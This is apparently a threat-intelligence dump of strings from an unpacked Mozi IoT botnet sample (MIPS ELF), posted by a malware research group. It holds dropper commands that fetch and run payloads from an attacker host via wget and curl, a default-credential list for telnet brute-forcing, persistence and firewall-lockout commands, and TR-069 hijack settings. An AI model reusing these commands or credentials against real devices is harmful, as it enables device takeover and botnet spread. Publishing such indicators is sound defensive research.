MalwareMustDie

Unpacked strings & recent exploits cmd of MOZI #2 (MIPS ELF)

Mar 9th, 2020
  1. Mozi IoT malware has launched another new campaign.
  2. This report has two parts: (1) the unpacked strings of the MIPS ELF of the latest Mozi Linux/IoT malware, and (2) the attack (exploit) requests that are also hardcoded in the binary. Sample hash (MD5): 4dde761681684d7edad4e5e1ffdb940b
  3.  
  4. (1) Strings in the unpacked binary
  5.  
  6. 0x0002c960 sfjsxkfl2dn6ani
  7. 0x0002c970 8.8.8.8
  8. 0x0002c978 /proc/net/route
  9. 0x0002c988 \t00000000\t
  10. 0x0002c994 RANDOM
  11. 0x0002c99c %s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n
  12. 0x0002c9e4 GET /cdn-cgi/l/chk_captcha HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n
  13. 0x0002ca58 HTTP
  14. 0x0002ca70 Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
  15. 0x0002caac Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
  16. 0x0002caf0 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
  17. 0x0002cb34 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
  18. 0x0002cb78 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
  19. 0x0002cbbc Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
  20. 0x0002cc00 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
  21. 0x0002cc44 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
  22. 0x0002ccb4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
  23. 0x0002cd28 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
  24. 0x0002cd74 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
  25. 0x0002cdfc Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
  26. 0x0002ce48 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
  27. 0x0002ceb8 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
  28. 0x0002cf28 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
  29. 0x0002cf9c Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
  30. 0x0002d014 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  31. 0x0002d05c Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
  32. 0x0002d08c Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
  33. 0x0002d0cc Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
  34. 0x0002d118 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
  35. 0x0002d190 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
  36. 0x0002d200 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
  37. 0x0002d270 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
  38. 0x0002d2e4 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
  39. 0x0002d378 Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
  40. 0x0002d3c0 Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
  41. 0x0002d408 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
  42. 0x0002d448 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
  43. 0x0002d4c4 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
  44. 0x0002d52c Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
  45. 0x0002d5a8 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
  46. 0x0002d5f8 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
  47. 0x0002d64c Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
  48. 0x0002d6a0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
  49. 0x0002d6f4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
  50. 0x0002d74c HEAD
  51. 0x0002d754 POST
  52. 0x0002d75c ./config
  53. 0x0002d768 /tmp/config
  54. 0x0002d774 /var/config
  55. 0x0002d780 select: %s [%s:%d]\n
  56. 0x0002d794 botv2/config.c
  57. 0x0002d7a4 connect time out
  58. 0x0002d7b8 GET /c HTTP/1.0\n
  59. 0x0002d7cc Host: %s\n
  60. 0x0002d7d8 %d.%d.%d.%d
  61. 0x0002d7e4 %hhu.%hhu.%hhu.%hhu
  62. 0x0002d7f8 8.8.8.8 pool.ntp.org ntp.ubuntu.com time.nist.gov
  63. 0x0002d834 %lu.%lu.%lu.%lu
  64. 0x0002d844 (null)
  65. 0x0002d84c [dip]
  66. 0x0002d854 [/dip]
  67. 0x0002d85c 7001
  68. 0x0002d864 [atk]
  69. 0x0002d86c [/atk]
  70. 0x0002d874 loginok
  71. 0x0002d87c Host: %s
  72. 0x0002d888 %s:%d
  73. 0x0002d890 http
  74. 0x0002d898 Server:
  75. 0x0002d8a0 Content-Length
  76. 0x0002d8b0 HTTP/
  77. 0x0002d8b8 complete
  78. 0x0002d8c4 gpon8080
  79. 0x0002d8d4 gpon80
  80. 0x0002d8dc realtek
  81. 0x0002d8e4 netgear8080
  82. 0x0002d8f0 netgear80
  83. 0x0002d8fc huawei
  84. 0x0002d904 tr064
  85. 0x0002d90c hnap
  86. 0x0002d914 camcrossweb
  87. 0x0002d920 camjaws
  88. 0x0002d928 dlink
  89. 0x0002d930 r7064
  90. 0x0002d938 vacron
  91. 0x0002d944 mv -f %s %s
  92. 0x0002d958 1:v4:JBls
  93. 0x0002d964 %02X
  94. 0x0002d96c %d%c%d%c%d%c%d%c
  95. 0x0002d980 %s\t%lX\t%lX
  96. 0x0002d98c /etc/rc.d/rc.local
  97. 0x0002d9a0 /etc/rc.local
  98. 0x0002d9b4 exit
  99. 0x0002d9bc \n%s%s
  100. 0x0002d9c4 &\nexit 0\n
  101. 0x0002d9d8 config
  102. 0x0002d9e0 %ld%s%s
  103. 0x0002d9e8 &\nexit 1\n
  104. 0x0002d9fc %s/%s
  105. 0x0002da04 /proc/
  106. 0x0002da0c /var/
  107. 0x0002da14 /lib/
  108. 0x0002da1c /dev/
  109. 0x0002da24 /sys/
  110. 0x0002da2c cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"
  111. 0x0002da90 cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"
  112. 0x0002db00 iptables -I INPUT  -p tcp --destination-port 35000 -j DROP
  113. 0x0002db3c iptables -I INPUT  -p tcp --destination-port 50023 -j DROP
  114. 0x0002db78 iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
  115. 0x0002dbb0 iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
  116. 0x0002dbe8 iptables -I INPUT  -p tcp --destination-port 7547 -j DROP
  117. 0x0002dc24 iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
  118. 0x0002dc5c /mnt/jffs2/Equip.sh
  119. 0x0002dc70 %s%s%s%s
  120. 0x0002dc7c #!/bin/sh
  121. 0x0002dc88 /mnt/jffs2/wifi.sh
  122. 0x0002dc9c /mnt/jffs2/WifiPerformance.sh
  123. 0x0002dcbc /proc/mounts
  124. 0x0002dccc %255s %255s %255s %255s\n
  125. 0x0002dcf8 /bin/sh
  126. 0x0002dd00 /bin/bash
  127. 0x0002dd0c /etc/rc.d/
  128. 0x0002dd18 /etc/rcS.d/
  129. 0x0002dd24 %s%s%s%s%s
  130. 0x0002dd34 /etc/init.d/S95baby.sh
  131. 0x0002dd4c iptables -I INPUT  -p tcp --destination-port 58000 -j DROP
  132. 0x0002dd88 iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
  133. 0x0002ddc0 /usr/local/ct
  134. 0x0002ddd0 rm /home/httpd/web_shell_cmd.gch
  135. 0x0002ddf4 echo 3 > /usr/local/ct/ctadmincfg
  136. 0x0002de18 /usr/local/ct/ctadmin0
  137. 0x0002de30 sendcmd 1 DB set MgtServer 0 Tr069Enable 1
  138. 0x0002de5c sendcmd 1 DB set PdtMiddleWare 0 Tr069Enable 0
  139. 0x0002de8c sendcmd 1 DB set MgtServer 0 URL http://127.0.0.1
  140. 0x0002dec0 sendcmd 1 DB set MgtServer 0 UserName notitms
  141. 0x0002def0 sendcmd 1 DB set MgtServer 0 ConnectionRequestUsername notitms
  142. 0x0002df30 sendcmd 1 DB set MgtServer 0 PeriodicInformEnable 0
  143. 0x0002df64 sendcmd 1 DB save
  144. 0x0002df78 [count]
  145. 0x0002df80 [/count]
  146. 0x0002df8c [ver]
  147. 0x0002df94 [/ver]
  148. 0x0002df9c [hp]
  149. 0x0002dfa4 [/hp]
  150. 0x0002dfb0 /dev/urandom
  151. 0x0002dfc0 /dev/random
  152. 0x0002dfcc /overlay
  153. 0x0002dfd8 mount -o remount,rw /overlay /
  154. 0x0002dff8 /overlay/upper
  155. 0x0002e008 /overlay/upper/usr
  156. 0x0002e01c /overlay/upper/etc
  157. 0x0002e030 /overlay/upper/etc/rc.d
  158. 0x0002e048 /overlay/upper/etc/init.d
  159. 0x0002e064 /overlay/usr
  160. 0x0002e074 /overlay/etc
  161. 0x0002e084 /overlay/etc/rc.d
  162. 0x0002e098 /overlay/etc/init.d
  163. 0x0002e0ac /usr/networks
  164. 0x0002e0bc /usr/networkstmp
  165. 0x0002e0d0 %5hu
  166. 0x0002e0d8 GET %s HTTP/1.1\r\nHost: %s\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\nReferer: http://baidu.com/%s/%s/%d/%s/%s%s)\r\n\r\n
  167. 0x0002e164 GET %s HTTP/1.1\r\nHost: %s\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\n\r\n
  168. 0x0002e1c4 HTTP/1.1
  169. 0x0002e1d0 Content-Length:
  170. 0x0002e1e0 Content-Type:
  171. 0x0002e1f0 no aliases
  172. 0x0002e200 [ud]
  173. 0x0002e208 [/ud]
  174. 0x0002e210 confirmed.list
  175. 0x0002e220 new.list
  176. 0x0002e22c kill -9 %d
  177. 0x0002e238 baby
  178. 0x0002e240 [dr]
  179. 0x0002e248 [/dr]
  180. 0x0002e254 botv2/headers/down.h
  181. 0x0002e26c 1:v4:
  182. 0x0002e278 2:id20:
  183. 0x0002e280 9:info_hash20:
  184. 0x0002e290 porti
  185. 0x0002e298 6:target20:
  186. 0x0002e2a4 5:token
  187. 0x0002e2ac 5:nodes
  188. 0x0002e2b4 6:nodes6
  189. 0x0002e2c0 6:valuesl
  190. 0x0002e2cc 4:wantl
  191. 0x0002e2dc 1:y1:r
  192. 0x0002e2e4 1:y1:e
  193. 0x0002e2ec 1:y1:q
  194. 0x0002e2f4 1:q4:ping
  195. 0x0002e300 1:q9:find_node
  196. 0x0002e310 1:q9:get_peers
  197. 0x0002e320 1:q13:announce_peer
  198. 0x0002e334 d1:eli%de%d:
  199. 0x0002e344 e1:t%d:
  200. 0x0002e34c 1:y1:ee
  201. 0x0002e354 d1:rd2:id20:
  202. 0x0002e364 5:nodes%d:
  203. 0x0002e370 6:nodes6%d:
  204. 0x0002e37c 1:y1:re
  205. 0x0002e384 d1:ad2:id20:
  206. 0x0002e394 2:n4
  207. 0x0002e39c 2:n6
  208. 0x0002e3a4 4:wantl%s%se
  209. 0x0002e3b4 e1:q9:find_node1:t%d:
  210. 0x0002e3cc 1:y1:qe
  211. 0x0002e3d8 e1:q4:ping1:t%d:
  212. 0x0002e3f0 [cpux]
  213. 0x0002e3f8 [/cpux]
  214. 0x0002e400 [cpu]
  215. 0x0002e408 [/cpu]
  216. 0x0002e410 [ssx]
  217. 0x0002e418 [/ssx]
  218. 0x0002e420 [ss]
  219. 0x0002e428 [/ss]
  220. 0x0002e430 none
  221. 0x0002e438 [sv]
  222. 0x0002e440 [/sv]
  223. 0x0002e448 [rn]
  224. 0x0002e450 [/rn]
  225. 0x0002e458 run:
  226. 0x0002e460 [nd]
  227. 0x0002e468 [/nd]
  228. 0x0002e470 /tmp
  229. 0x0002e478 /var
  230. 0x0002e480 /temp
  231. 0x0002e488 iptables -I INPUT  -p udp --destination-port %d -j ACCEPT
  232. 0x0002e4c4 iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
  233. 0x0002e4fc iptables -I PREROUTING  -t nat -p udp --destination-port %d -j ACCEPT
  234. 0x0002e544 iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
  235. 0x0002e588 0.0.0.0
  236. 0x0002e590 [idp]
  237. 0x0002e598 This node doesn t accept announces
  238. 0x0002e5bc dht.transmissionbt.com:6881
  239. 0x0002e5d8 router.bittorrent.com:6881
  240. 0x0002e5f4 router.utorrent.com:6881
  241. 0x0002e610 bttracker.debian.org:6881
  242. 0x0002e62c 212.129.33.59:6881
  243. 0x0002e640 82.221.103.244:6881
  244. 0x0002e654 130.239.18.159:6881
  245. 0x0002e668 87.98.162.88:6881
  246. 0x0002e67c /temp/
  247. 0x0002e684 /var/tmp/
  248. 0x0002e690 /var/run/
  249. 0x0002e69c /usr/
  250. 0x0002e6a4 /mnt/
  251. 0x0002e6ac /home/
  252. 0x0002e6b4 http://
  253. 0x0002e6bc https://
  254. 0x0002e750 GET /c
  255. 0x0002e760 HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: %d\r\nConnection: close\r\nContent-Type: application/zip\r\n\r\n loginok
  256. 0x0002e7d4 HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: %d\r\nConnection: close\r\nContent-Type: application/zip\r\n\r\n
  257. 0x0002e840 iptables -I INPUT  -p tcp --destination-port %d -j ACCEPT
  258. 0x0002e87c iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
  259. 0x0002e8b4 iptables -I PREROUTING  -t nat -p tcp --destination-port %d -j ACCEPT
  260. 0x0002e8fc iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
  261. 0x0002e940 iptables -I INPUT  -p tcp --destination-port 22 -j DROP
  262. 0x0002e978 iptables -I INPUT  -p tcp --destination-port 23 -j DROP
  263. 0x0002e9b0 iptables -I INPUT  -p tcp --destination-port 2323 -j DROP
  264. 0x0002e9ec iptables -I OUTPUT -p tcp --source-port 22 -j DROP
  265. 0x0002ea20 iptables -I OUTPUT -p tcp --source-port 23 -j DROP
  266. 0x0002ea54 iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
  267. 0x0002ea8c /dev/watchdog
  268. 0x0002ea9c /dev/watchdog0
  269. 0x0002eaac /dev/misc/watchdog
  270. 0x0002eac0 /etc/watchdog
  271. 0x0002ead0 /dev/FTWDT101_watchdog
  272. 0x0002eae8 /dev/FTWDT101\\ watchdog
  273. 0x0002eb00 /dev/FTWDT101/watchdog
  274. 0x0002eb18 /sbin/watchdog
  275. 0x0002eb28 /bin/watchdog
  276. 0x0002eb38 /etc/default/watchdog
  277. 0x0002eb50 /proc/%d/status
  278. 0x0002eb60 %*s %s
  279. 0x0002eb68 /proc/net/raw
  280. 0x0002eb78 /proc/net/tcp
  281. 0x0002eb8c killall -9 %s
  282. 0x0002eb9c /proc
  283. 0x0002eba4 /proc/%s/exe
  284. 0x0002ebb4 /run
  285. 0x0002ebbc /baby
  286. 0x0002ebc4 /usr/bin/python
  287. 0x0002ebd4 sshd
  288. 0x0002ebdc dropbear
  289. 0x0002ebe8 255.255.255.255
  290. 0x0002ebf8 255.255.0.0
  291. 0x0002ec04 %08X%08X%08X%08X%08X%08X
  292. 0x0002ecfb Oh.o
  293. 0x0002ed20 [debug] >>> %s
  294. 0x0002ed30 -ne ELF
  295. 0x0002ed38 sage:
  296. 0x0002ed40 /bin/busybox cat /bin/ls|head -n 1\r\n
  297. 0x0002ed68 /bin/busybox hexdump -e `16/1 "%c"` -n 52 /bin/ls\r\n
  298. 0x0002ed9c /bin/busybox cat /bin/ls|more\r\n
  299. 0x0002edc0 dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox\r\n
  300. 0x0002ee4c /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox\r\n
  301. 0x0002ef00 sparc
  302. 0x0002ef08 i686
  303. 0x0002ef10 m68k
  304. 0x0002ef18 powerpc
  305. 0x0002ef24 superh
  306. 0x0002ef2c x86_64
  307. 0x0002ef34 mipsel
  308. 0x0002ef3c mips
  309. 0x0002ef44 \\x%02x
  310. 0x0002ef54 /bin/busybox chmod 777 Mozi || (cp /bin/ls Mozz;cat Mozi>Mozz;rm Mozi;cp Mozz Mozi;rm Mozz)
  311. 0x0002efb4 /bin/busybox echo  -en `%s` %s Mozi; %s ;/bin/busybox echo -en `\\x44\\x52\\x4f\\x50\\x50\\x45\\x52`\r\n
  312. 0x0002f014 /bin/busybox echo '%s' %s Mozi; %s ; /bin/busybox echo '\\x44\\x52\\x4f\\x50\\x50\\x45\\x52'\r\n
  313. 0x0002f06c ./Mozi %d %d %d %d %d;./Runn;/bin/busybox echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
  314. 0x0002f0c8 connected
  315. 0x0002f0d4 nvalid
  316. 0x0002f0dc ailed
  317. 0x0002f0e4 ncorrect
  318. 0x0002f0f0 enied
  319. 0x0002f0f8 rror
  320. 0x0002f100 oodbye
  321. 0x0002f114 shell
  322. 0x0002f11c dvrdvs
  323. 0x0002f124 mdm9625
  324. 0x0002f12c 9615-cdp
  325. 0x0002f140 #user
  326. 0x0002f148 ogin
  327. 0x0002f150 name
  328. 0x0002f158 pass
  329. 0x0002f160 busybox
  330. 0x0002f168 cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://%s:%d/i; curl -O http://%s:%d/i; /bin/busybox wget http://%s:%d/i; chmod 777 i || (cp /bin/ls ii;cat i>ii;rm i;cp ii i;rm ii); ./i; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
  331. 0x0002f278 cd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://%s:%d/bin.sh; curl -O http://%s:%d/bin.sh; /bin/busybox wget http://%s:%d/bin.sh; chmod 777 bin.sh || (cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh); sh bin.sh %s; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
  332. 0x0002f3c4 start\r\nenable\r\nconfig terminal\r\nsystem\r\nlinuxshell\r\nsu\r\nshell\r\nsh\r\ncd /tmp || cd /var/ || cd /var/run || cd /mnt || cd /root || cd /;/bin/busybox echo -ne '\\x45\\x4c\\x46'\r\n
  333. 0x0002f470 /bin/busybox wget;/bin/busybox echo -ne '\\x45\\x4c\\x46'\r\n
  334. 0x0002f4ac DROPPER
  335. 0x0002f4ff troot
  336. 0x0002f508 admin
  337. 0x0002f510 CUAdmin
  338. 0x0002f51c default
  339. 0x0002f528 rapport
  340. 0x0002f534 super
  341. 0x0002f53c telnetadmin
  342. 0x0002f54c !!Huawei
  343. 0x0002f558 keomeo
  344. 0x0002f560 support
  345. 0x0002f56c CMCCAdmin
  346. 0x0002f578 e8telnet
  347. 0x0002f584 e8ehome1
  348. 0x0002f590 e8ehome
  349. 0x0002f59c user
  350. 0x0002f5a4 mother
  351. 0x0002f5ac Administrator
  352. 0x0002f5bc service
  353. 0x0002f5c8 supervisor
  354. 0x0002f5d4 guest
  355. 0x0002f5dc admin1
  356. 0x0002f5e4 administrator
  357. 0x0002f5f4 666666
  358. 0x0002f5fc 888888
  359. 0x0002f604 ubnt
  360. 0x0002f60c tech
  361. 0x0002f614 xc3511
  362. 0x0002f61c vizxv
  363. 0x0002f624 Pon521
  364. 0x0002f62c e2008jl
  365. 0x0002f638 r@p8p0r+
  366. 0x0002f644 GM8182
  367. 0x0002f64c gpon
  368. 0x0002f654 Zte521
  369. 0x0002f65c hg2x0
  370. 0x0002f664 epicrouter
  371. 0x0002f670 conexant
  372. 0x0002f67c xJ4pCYeW
  373. 0x0002f688 v2mprt
  374. 0x0002f690 PhrQjGzk
  375. 0x0002f69c h@32LuyD
  376. 0x0002f6a8 gw1admin
  377. 0x0002f6b4 adminpass
  378. 0x0002f6c0 xmhdipc
  379. 0x0002f6cc juantech
  380. 0x0002f6d8 @HuaweiHgw
  381. 0x0002f6e4 adminHW
  382. 0x0002f6f0 2010vesta
  383. 0x0002f6fc 2011vesta
  384. 0x0002f708 plumeria0077
  385. 0x0002f718 cat1029
  386. 0x0002f724 123456
  387. 0x0002f72c 54321
  388. 0x0002f738 hi3518
  389. 0x0002f740 password
  390. 0x0002f74c 12345
  391. 0x0002f754 fucker
  392. 0x0002f75c pass
  393. 0x0002f764 admin1234
  394. 0x0002f770 1111
  395. 0x0002f778 smcadmin
  396. 0x0002f784 1234
  397. 0x0002f78c klv123
  398. 0x0002f794 klv1234
  399. 0x0002f7a8 jvbzd
  400. 0x0002f7b0 anko
  401. 0x0002f7b8 zlxx
  402. 0x0002f7c0 7ujMko0vizxv
  403. 0x0002f7d0 7ujMko0admin
  404. 0x0002f7e0 system
  405. 0x0002f7e8 ikwb
  406. 0x0002f7f0 dreambox
  407. 0x0002f7fc realtek
  408. 0x0002f808 00000000
  409. 0x0002f814 1111111
  410. 0x0002f820 meinsm
  411. 0x0002f9fe ATU1
  413. 0x0002fbfb \n\r\n\ru
  414. 0x0002fcb8 Mozi\n
  415. 0x0002fcbe /proc/self/cmdline
  416. 0x0002fcd1 Runn
  417. 0x0002fcd6 ERR\n
  418. 0x0002fcdb GET /Mozi.6 HTTP/1.0\r\n\r\n
  419. 0x0002fcf4 FIN\n
  420. 0x0002fe79 .shstrtab
  421. 0x0002fe83 .text
  422. 0x0002fe89 .rodata
  423. 0x0002fe91 .bss
  424. 0x00030490 \n\r\n\rx
  425. 0x00030514 /proc/self/cmdline
  426. 0x00030528 Runn
  427. 0x00030530 ERR\n
  428. 0x00030538 GET /Mozi.7 HTTP/1.0\r\n\r\n
  429. 0x00030554 FIN\n
  430. 0x0003056d aeabi
  431. 0x00030579 .shstrtab
  432. 0x00030583 .text
  433. 0x00030589 .rodata
  434. 0x00030591 .got
  435. 0x00030596 .bss
  436. 0x0003059b .ARM.attributes
  437. 0x00030b98 Mozi\n
  438. 0x00030ba0 /proc/self/cmdline
  439. 0x00030bb8 Runn
  440. 0x00030bc0 ERR\n
  441. 0x00030bc8 GET /Mozi.c HTTP/1.0\r\n\r\n
  442. 0x00030be8 FIN\n
  443. 0x00030bf1 .shstrtab
  444. 0x00030bfb .text
  445. 0x00030c01 .rodata
  446. 0x00030c09 .bss
  447. 0x0003122e \r\n4B\r\n
  448. 0x00031420 Mozi\n
  449. 0x00031428 /proc/self/cmdline
  450. 0x0003143c Runn
  451. 0x00031444 ERR\n
  452. 0x0003144c GET /Mozi.m HTTP/1.0\r\n\r\n
  453. 0x00031468 FIN\n
  454. 0x000314d9 .shstrtab
  455. 0x000314e3 .text
  456. 0x000314e9 .rodata
  457. 0x000314f1 .got
  458. 0x000314f6 .bss
  459. 0x000314fb .mdebug.abi32
  460. 0x000319d5 RPSW
  461. 0x00031a17 [^_]
  462. 0x00031a28 UWVS
  464. 0x00031a77 Mozi\n
  465. 0x00031a7d /proc/self/cmdline
  466. 0x00031a90 Runn
  467. 0x00031a95 ERR\n
  468. 0x00031a9a GET /Mozi.x HTTP/1.0\r\n\r\n
  469. 0x00031ab3 FIN\n
  470. 0x00031ab9 .shstrtab
  471. 0x00031ac3 .text
  472. 0x00031ac9 .rodata
  473. 0x00031ad1 .bss
  475. 0x0003202c Mozi\n
  476. 0x00032034 /proc/self/cmdline
  477. 0x00032048 Runn
  478. 0x00032050 ERR\n
  479. 0x00032058 GET /Mozi.a HTTP/1.0\r\n\r\n
  480. 0x00032074 FIN\n
  481. 0x0003207d .shstrtab
  482. 0x00032087 .text
  483. 0x0003208d .rodata
  484. 0x00032095 .bss
  485. 0x000325c8 Mozi\n
  486. 0x000325d0 /proc/self/cmdline
  487. 0x000325e4 Runn
  488. 0x000325ec ERR\n
  489. 0x000325f4 GET /Mozi.s HTTP/1.0\r\n\r\n
  490. 0x00032610 FIN\n
  491. 0x00032619 .shstrtab
  492. 0x00032623 .text
  493. 0x00032629 .rodata
  494. 0x00032631 .bss
  495. 0x00032c2a Mozi\n
  496. 0x00032c30 /proc/self/cmdline
  497. 0x00032c43 Runn
  498. 0x00032c48 ERR\n
  499. 0x00032c4d GET /Mozi.r HTTP/1.0\r\n\r\n
  500. 0x00032c66 FIN\n
  501. 0x000336ed .shstrtab
  502. 0x000336f7 .text
  503. 0x000336fd .rodata
  504. 0x00033705 .tbss
  505. 0x0003370b .got
  506. 0x00033d03 \b\r\n\r\n
  507. 0x00033d74 Mozi\n
  508. 0x00033d7c /proc/self/cmdline
  509. 0x00033d90 Runn
  510. 0x00033d98 ERR\n
  511. 0x00033da0 GET /Mozi.b HTTP/1.0\r\n\r\n
  512. 0x00033dbc FIN\n
  513. 0x00033dc5 .shstrtab
  514. 0x00033dcf .text
  515. 0x00033dd5 .rodata
  516. 0x00033ddd .bss
  517. 0x00034578 Mozi\n
  518. 0x00034580 /proc/self/cmdline
  519. 0x00034598 Runn
  520. 0x000345a0 ERR\n
  521. 0x000345a8 GET /Mozi.4 HTTP/1.0\r\n\r\n
  522. 0x000345c8 FIN\n
  523. 0x00034689 .shstrtab
  524. 0x00034693 .text
  525. 0x00034699 .rodata
  526. 0x000346a1 .got
  527. 0x000346a6 .bss
  528. 0x00034cd2 Mozi\n
  529. 0x00034cd8 /proc/self/cmdline
  530. 0x00034ceb Runn
  531. 0x00034cf0 ERR\n
  532. 0x00034cf5 GET /Mozi.k HTTP/1.0\r\n\r\n
  533. 0x00034d0e FIN\n
  534. 0x00034d15 .shstrtab
  535. 0x00034d1f .text
  536. 0x00034d25 .rodata
  537. 0x00034d2d .bss
  538. 0x00035594 Mozi\n
  539. 0x0003559c /proc/self/cmdline
  540. 0x000355b0 Runn
  541. 0x000355b8 ERR\n
  542. 0x000355c0 GET /Mozi.l HTTP/1.0\r\n\r\n
  543. 0x000355dc FIN\n
  544. 0x0003564d .shstrtab
  545. 0x00035657 .text
  546. 0x0003565d .rodata
  547. 0x00035665 .got
  548. 0x0003566a .bss
  549. 0x0003566f .mdebug.abi32
  550. 0x00035cf4 Mozi\n
  551. 0x00035cfc /proc/self/cmdline
  552. 0x00035d10 Runn
  553. 0x00035d18 ERR\n
  554. 0x00035d20 GET /Mozi.p HTTP/1.0\r\n\r\n
  555. 0x00035d3c FIN\n
  556. 0x00035d45 .shstrtab
  557. 0x00035d4f .text
  558. 0x00035d55 .rodata
  559. 0x00035d5d .sbss
  560. 0x00035e50 (nil)
  561. 0x00035e6f \b\n\n\n
  562. 0x00035e80 hlLjztqZ
  563. 0x00035ec0 npxXoudifFeEgGaACScs
  564. 0x00035f17 \a\b\t\n\v\f\r
  565. 0x00035f3a #$%&`()*+,234567
  566. 0x00035f4b ;<=>?@ABCDEFGJIMOPQRSTUVWX[\\^_`abcxyz{|}~
  567. 0x00035f90 Unknown error
  568. 0x00035fa0 Success
  569. 0x00035fa8 Operation not permitted
  570. 0x00035fc0 No such file or directory
  571. 0x00035fda No such process
  572. 0x00035fea Interrupted system call
  573. 0x00036002 Input/output error
  574. 0x00036015 No such device or address
  575. 0x0003602f Argument list too long
  576. 0x00036046 Exec format error
  577. 0x00036058 Bad file descriptor
